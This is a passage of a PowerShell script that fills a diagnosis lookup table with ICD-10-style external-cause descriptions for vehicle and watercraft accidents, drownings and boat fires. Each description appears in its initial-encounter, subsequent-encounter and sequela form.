transport accidents involving nonmotor vehicle (traffic)","Person injured in other specified (collision)(noncollision) transport accidents involving nonmotor vehicle (traffic), initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in other specified (collision)(noncollision) transport accidents involving nonmotor vehicle (traffic)","Person injured in other specified (collision)(noncollision) transport accidents involving nonmotor vehicle (traffic), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in other specified (collision)(noncollision) transport accidents involving nonmotor vehicle (traffic)","Person injured in other specified (collision)(noncollision) transport accidents involving nonmotor vehicle (traffic), sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and two- or three-wheeled motor vehicle, nontraffic","Person injured in collision between car and two- or three-wheeled motor vehicle, nontraffic, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and two- or three-wheeled motor vehicle, nontraffic","Person injured in collision between car and two- or three-wheeled motor vehicle, nontraffic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and two- or three-wheeled motor vehicle, nontraffic","Person injured in collision between car and two- or three-wheeled motor vehicle, nontraffic, sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between other motor vehicle and two- or three-wheeled motor vehicle, nontraffic","Person injured in collision between other motor vehicle and two- or three-wheeled motor vehicle, nontraffic, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between other motor vehicle and two- or three-wheeled motor vehicle, nontraffic","Person injured in collision between other motor vehicle and two- or three-wheeled motor vehicle, nontraffic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between other motor vehicle and two- or three-wheeled motor vehicle, nontraffic","Person injured in collision between other motor vehicle and two- or three-wheeled motor vehicle, nontraffic, sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and pick-up truck or van, nontraffic","Person injured in collision between car and pick-up truck or van, nontraffic, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and pick-up truck or van, nontraffic","Person injured in collision between car and pick-up truck or van, nontraffic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and pick-up truck or van, nontraffic","Person injured in collision between car and pick-up truck or van, nontraffic, sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and bus, nontraffic","Person injured in collision between car and bus, nontraffic, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and bus, nontraffic","Person injured in collision between car and bus, nontraffic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and bus, nontraffic","Person injured in collision between car and bus, nontraffic, sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and heavy transport vehicle, nontraffic","Person injured in collision between car and heavy transport vehicle, nontraffic, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and heavy transport vehicle, nontraffic","Person injured in collision between car and heavy transport vehicle, nontraffic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between car and heavy transport vehicle, nontraffic","Person injured in collision between car and heavy transport vehicle, nontraffic, sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between heavy transport vehicle and bus, nontraffic","Person injured in collision between heavy transport vehicle and bus, nontraffic, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between heavy transport vehicle and bus, nontraffic","Person injured in collision between heavy transport vehicle and bus, nontraffic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between heavy transport vehicle and bus, nontraffic","Person injured in collision between heavy transport vehicle and bus, nontraffic, sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between railway train or railway vehicle and car, nontraffic","Person injured in collision between railway train or railway vehicle and car, nontraffic, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between railway train or railway vehicle and car, nontraffic","Person injured in collision between railway train or railway vehicle and car, nontraffic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between railway train or railway vehicle and car, nontraffic","Person injured in collision between railway train or railway vehicle and car, nontraffic, sequela") + $null = $DiagnosisList.Rows.Add("Person injured in collision between other specified motor vehicle, nontraffic","Person injured in collision between other specified motor vehicle, nontraffic, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between other specified motor vehicle, nontraffic","Person injured in collision between other specified motor vehicle, nontraffic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in collision between other specified motor vehicle, nontraffic","Person injured in collision between other specified motor vehicle, nontraffic, sequela") + $null = $DiagnosisList.Rows.Add("Person injured in other specified noncollision transport accidents involving motor vehicle, nontraffic","Person injured in other specified noncollision transport accidents involving motor vehicle, nontraffic, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in other specified noncollision transport accidents involving motor vehicle, nontraffic","Person injured in other specified noncollision transport accidents involving motor vehicle, nontraffic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in other specified noncollision transport accidents involving motor vehicle, nontraffic","Person injured in other specified noncollision transport accidents involving motor vehicle, nontraffic, sequela") + $null = $DiagnosisList.Rows.Add("Person injured in other specified (collision)(noncollision) transport accidents involving nonmotor vehicle, nontraffic","Person injured in other specified (collision)(noncollision) transport accidents involving nonmotor vehicle, nontraffic, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in other specified (collision)(noncollision) transport accidents involving nonmotor vehicle, nontraffic","Person injured in other specified (collision)(noncollision) transport accidents involving nonmotor vehicle, nontraffic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in other specified (collision)(noncollision) transport accidents involving nonmotor vehicle, nontraffic","Person injured in other specified (collision)(noncollision) transport accidents involving nonmotor vehicle, nontraffic, sequela") + $null = $DiagnosisList.Rows.Add("Person injured in unspecified motor-vehicle accident, nontraffic","Person injured in unspecified motor-vehicle accident, nontraffic, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in unspecified motor-vehicle accident, nontraffic","Person injured in unspecified motor-vehicle accident, nontraffic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in unspecified motor-vehicle accident, nontraffic","Person injured in unspecified motor-vehicle accident, nontraffic, sequela") + $null = $DiagnosisList.Rows.Add("Person injured in unspecified nonmotor-vehicle accident, nontraffic","Person injured in unspecified nonmotor-vehicle accident, nontraffic, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in unspecified nonmotor-vehicle accident, nontraffic","Person injured in unspecified nonmotor-vehicle accident, nontraffic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in unspecified nonmotor-vehicle accident, nontraffic","Person injured in unspecified nonmotor-vehicle accident, nontraffic, sequela") + $null = $DiagnosisList.Rows.Add("Person injured in unspecified motor-vehicle accident, traffic","Person injured in unspecified motor-vehicle accident, traffic, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in unspecified motor-vehicle accident, traffic","Person injured in unspecified motor-vehicle accident, traffic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in unspecified motor-vehicle accident, traffic","Person injured in unspecified motor-vehicle accident, traffic, sequela") + $null = $DiagnosisList.Rows.Add("Person injured in unspecified nonmotor-vehicle accident, traffic","Person injured in unspecified nonmotor-vehicle accident, traffic, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in unspecified nonmotor-vehicle accident, traffic","Person injured in unspecified nonmotor-vehicle accident, traffic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in unspecified nonmotor-vehicle accident, traffic","Person injured in unspecified nonmotor-vehicle accident, traffic, sequela") + $null = $DiagnosisList.Rows.Add("Person injured in unspecified vehicle accident","Person injured in unspecified vehicle accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person injured in unspecified vehicle accident","Person injured in unspecified vehicle accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person injured in unspecified vehicle accident","Person injured in unspecified vehicle accident, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to merchant ship overturning","Drowning and submersion due to merchant ship overturning, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to merchant ship overturning","Drowning and submersion due to merchant ship overturning, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to merchant ship overturning","Drowning and submersion due to merchant ship overturning, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to passenger ship overturning","Drowning and submersion due to passenger ship overturning, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to passenger ship overturning","Drowning and submersion due to passenger ship overturning, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to passenger ship overturning","Drowning and submersion due to passenger ship overturning, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fishing boat overturning","Drowning and submersion due to fishing boat overturning, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fishing boat overturning","Drowning and submersion due to fishing boat overturning, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fishing boat overturning","Drowning and submersion due to fishing boat overturning, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other powered watercraft overturning","Drowning and submersion due to other powered watercraft overturning, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other powered watercraft overturning","Drowning and submersion due to other powered watercraft overturning, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other powered watercraft overturning","Drowning and submersion due to other powered watercraft overturning, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to sailboat overturning","Drowning and submersion due to sailboat overturning, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to sailboat overturning","Drowning and submersion due to sailboat overturning, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to sailboat overturning","Drowning and submersion due to sailboat overturning, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to canoe or kayak overturning","Drowning and submersion due to canoe or kayak overturning, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to canoe or kayak overturning","Drowning and submersion due to canoe or kayak overturning, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to canoe or kayak overturning","Drowning and submersion due to canoe or kayak overturning, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to (nonpowered) inflatable craft overturning","Drowning and submersion due to (nonpowered) inflatable craft overturning, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to (nonpowered) inflatable craft overturning","Drowning and submersion due to (nonpowered) inflatable craft overturning, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to (nonpowered) inflatable craft overturning","Drowning and submersion due to (nonpowered) inflatable craft overturning, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other unpowered watercraft overturning","Drowning and submersion due to other unpowered watercraft overturning, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other unpowered watercraft overturning","Drowning and submersion due to other unpowered watercraft overturning, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other unpowered watercraft overturning","Drowning and submersion due to other unpowered watercraft overturning, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to unspecified watercraft overturning","Drowning and submersion due to unspecified watercraft overturning, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to unspecified watercraft overturning","Drowning and submersion due to unspecified watercraft overturning, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to unspecified watercraft overturning","Drowning and submersion due to unspecified watercraft overturning, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to merchant ship sinking","Drowning and submersion due to merchant ship sinking, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to merchant ship sinking","Drowning and submersion due to merchant ship sinking, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to merchant ship sinking","Drowning and submersion due to merchant ship sinking, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to passenger ship sinking","Drowning and submersion due to passenger ship sinking, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to passenger ship sinking","Drowning and submersion due to passenger ship sinking, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to passenger ship sinking","Drowning and submersion due to passenger ship sinking, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fishing boat sinking","Drowning and submersion due to fishing boat sinking, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fishing boat sinking","Drowning and submersion due to fishing boat sinking, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fishing boat sinking","Drowning and submersion due to fishing boat sinking, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other powered watercraft sinking","Drowning and submersion due to other powered watercraft sinking, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other powered watercraft sinking","Drowning and submersion due to other powered watercraft sinking, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other powered watercraft sinking","Drowning and submersion due to other powered watercraft sinking, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to sailboat sinking","Drowning and submersion due to sailboat sinking, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to sailboat sinking","Drowning and submersion due to sailboat sinking, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to sailboat sinking","Drowning and submersion due to sailboat sinking, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to canoe or kayak sinking","Drowning and submersion due to canoe or kayak sinking, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to canoe or kayak sinking","Drowning and submersion due to canoe or kayak sinking, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to canoe or kayak sinking","Drowning and submersion due to canoe or kayak sinking, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to (nonpowered) inflatable craft sinking","Drowning and submersion due to (nonpowered) inflatable craft sinking, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to (nonpowered) inflatable craft sinking","Drowning and submersion due to (nonpowered) inflatable craft sinking, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to (nonpowered) inflatable craft sinking","Drowning and submersion due to (nonpowered) inflatable craft sinking, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other unpowered watercraft sinking","Drowning and submersion due to other unpowered watercraft sinking, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other unpowered watercraft sinking","Drowning and submersion due to other unpowered watercraft sinking, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other unpowered watercraft sinking","Drowning and submersion due to other unpowered watercraft sinking, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to unspecified watercraft sinking","Drowning and submersion due to unspecified watercraft sinking, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to unspecified watercraft sinking","Drowning and submersion due to unspecified watercraft sinking, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to unspecified watercraft sinking","Drowning and submersion due to unspecified watercraft sinking, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning merchant ship","Drowning and submersion due to falling or jumping from burning merchant ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning merchant ship","Drowning and submersion due to falling or jumping from burning merchant ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning merchant ship","Drowning and submersion due to falling or jumping from burning merchant ship, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning passenger ship","Drowning and submersion due to falling or jumping from burning passenger ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning passenger ship","Drowning and submersion due to falling or jumping from burning passenger ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning passenger ship","Drowning and submersion due to falling or jumping from burning passenger ship, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning fishing boat","Drowning and submersion due to falling or jumping from burning fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning fishing boat","Drowning and submersion due to falling or jumping from burning fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning fishing boat","Drowning and submersion due to falling or jumping from burning fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from other burning powered watercraft","Drowning and submersion due to falling or jumping from other burning powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from other burning powered watercraft","Drowning and submersion due to falling or jumping from other burning powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from other burning powered watercraft","Drowning and submersion due to falling or jumping from other burning powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning sailboat","Drowning and submersion due to falling or jumping from burning sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning sailboat","Drowning and submersion due to falling or jumping from burning sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning sailboat","Drowning and submersion due to falling or jumping from burning sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning canoe or kayak","Drowning and submersion due to falling or jumping from burning canoe or kayak, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning canoe or kayak","Drowning and submersion due to falling or jumping from burning canoe or kayak, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning canoe or kayak","Drowning and submersion due to falling or jumping from burning canoe or kayak, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning (nonpowered) inflatable craft","Drowning and submersion due to falling or jumping from burning (nonpowered) inflatable craft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning (nonpowered) inflatable craft","Drowning and submersion due to falling or jumping from burning (nonpowered) inflatable craft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning (nonpowered) inflatable craft","Drowning and submersion due to falling or jumping from burning (nonpowered) inflatable craft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning water-skis","Drowning and submersion due to falling or jumping from burning water-skis, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning water-skis","Drowning and submersion due to falling or jumping from burning water-skis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from burning water-skis","Drowning and submersion due to falling or jumping from burning water-skis, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from other burning unpowered watercraft","Drowning and submersion due to falling or jumping from other burning unpowered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from other burning unpowered watercraft","Drowning and submersion due to falling or jumping from other burning unpowered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from other burning unpowered watercraft","Drowning and submersion due to falling or jumping from other burning unpowered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from unspecified burning watercraft","Drowning and submersion due to falling or jumping from unspecified burning watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from unspecified burning watercraft","Drowning and submersion due to falling or jumping from unspecified burning watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from unspecified burning watercraft","Drowning and submersion due to falling or jumping from unspecified burning watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed merchant ship","Drowning and submersion due to falling or jumping from crushed merchant ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed merchant ship","Drowning and submersion due to falling or jumping from crushed merchant ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed merchant ship","Drowning and submersion due to falling or jumping from crushed merchant ship, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed passenger ship","Drowning and submersion due to falling or jumping from crushed passenger ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed passenger ship","Drowning and submersion due to falling or jumping from crushed passenger ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed passenger ship","Drowning and submersion due to falling or jumping from crushed passenger ship, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed fishing boat","Drowning and submersion due to falling or jumping from crushed fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed fishing boat","Drowning and submersion due to falling or jumping from crushed fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed fishing boat","Drowning and submersion due to falling or jumping from crushed fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from other crushed powered watercraft","Drowning and submersion due to falling or jumping from other crushed powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from other crushed powered watercraft","Drowning and submersion due to falling or jumping from other crushed powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from other crushed powered watercraft","Drowning and submersion due to falling or jumping from other crushed powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed sailboat","Drowning and submersion due to falling or jumping from crushed sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed sailboat","Drowning and submersion due to falling or jumping from crushed sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed sailboat","Drowning and submersion due to falling or jumping from crushed sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed canoe or kayak","Drowning and submersion due to falling or jumping from crushed canoe or kayak, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed canoe or kayak","Drowning and submersion due to falling or jumping from crushed canoe or kayak, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed canoe or kayak","Drowning and submersion due to falling or jumping from crushed canoe or kayak, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed (nonpowered) inflatable craft","Drowning and submersion due to falling or jumping from crushed (nonpowered) inflatable craft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed (nonpowered) inflatable craft","Drowning and submersion due to falling or jumping from crushed (nonpowered) inflatable craft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed (nonpowered) inflatable craft","Drowning and submersion due to falling or jumping from crushed (nonpowered) inflatable craft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed water-skis","Drowning and submersion due to falling or jumping from crushed water-skis, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed water-skis","Drowning and submersion due to falling or jumping from crushed water-skis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed water-skis","Drowning and submersion due to falling or jumping from crushed water-skis, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from other crushed unpowered watercraft","Drowning and submersion due to falling or jumping from other crushed unpowered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from other crushed unpowered watercraft","Drowning and submersion due to falling or jumping from other crushed unpowered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from other crushed unpowered watercraft","Drowning and submersion due to falling or jumping from other crushed unpowered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed unspecified watercraft","Drowning and submersion due to falling or jumping from crushed unspecified watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed unspecified watercraft","Drowning and submersion due to falling or jumping from crushed unspecified watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to falling or jumping from crushed unspecified watercraft","Drowning and submersion due to falling or jumping from crushed unspecified watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to merchant ship","Drowning and submersion due to other accident to merchant ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to merchant ship","Drowning and submersion due to other accident to merchant ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to merchant ship","Drowning and submersion due to other accident to merchant ship, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to passenger ship","Drowning and submersion due to other accident to passenger ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to passenger ship","Drowning and submersion due to other accident to passenger ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to passenger ship","Drowning and submersion due to other accident to passenger ship, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to fishing boat","Drowning and submersion due to other accident to fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to fishing boat","Drowning and submersion due to other accident to fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to fishing boat","Drowning and submersion due to other accident to fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to other powered watercraft","Drowning and submersion due to other accident to other powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to other powered watercraft","Drowning and submersion due to other accident to other powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to other powered watercraft","Drowning and submersion due to other accident to other powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to sailboat","Drowning and submersion due to other accident to sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to sailboat","Drowning and submersion due to other accident to sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to sailboat","Drowning and submersion due to other accident to sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to canoe or kayak","Drowning and submersion due to other accident to canoe or kayak, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to canoe or kayak","Drowning and submersion due to other accident to canoe or kayak, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to canoe or kayak","Drowning and submersion due to other accident to canoe or kayak, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to (nonpowered) inflatable craft","Drowning and submersion due to other accident to (nonpowered) inflatable craft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to (nonpowered) inflatable craft","Drowning and submersion due to other accident to (nonpowered) inflatable craft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to (nonpowered) inflatable craft","Drowning and submersion due to other accident to (nonpowered) inflatable craft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to water-skis","Drowning and submersion due to other accident to water-skis, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to water-skis","Drowning and submersion due to other accident to water-skis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to water-skis","Drowning and submersion due to other accident to water-skis, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to other unpowered watercraft","Drowning and submersion due to other accident to other unpowered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to other unpowered watercraft","Drowning and submersion due to other accident to other unpowered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to other unpowered watercraft","Drowning and submersion due to other accident to other unpowered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to unspecified watercraft","Drowning and submersion due to other accident to unspecified watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to unspecified watercraft","Drowning and submersion due to other accident to unspecified watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to other accident to unspecified watercraft","Drowning and submersion due to other accident to unspecified watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to merchant ship on fire","Burn due to merchant ship on fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to merchant ship on fire","Burn due to merchant ship on fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to merchant ship on fire","Burn due to merchant ship on fire, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to passenger ship on fire","Burn due to passenger ship on fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to passenger ship on fire","Burn due to passenger ship on fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to passenger ship on fire","Burn due to passenger ship on fire, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to fishing boat on fire","Burn due to fishing boat on fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to fishing boat on fire","Burn due to fishing boat on fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to fishing boat on fire","Burn due to fishing boat on fire, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to other powered watercraft on 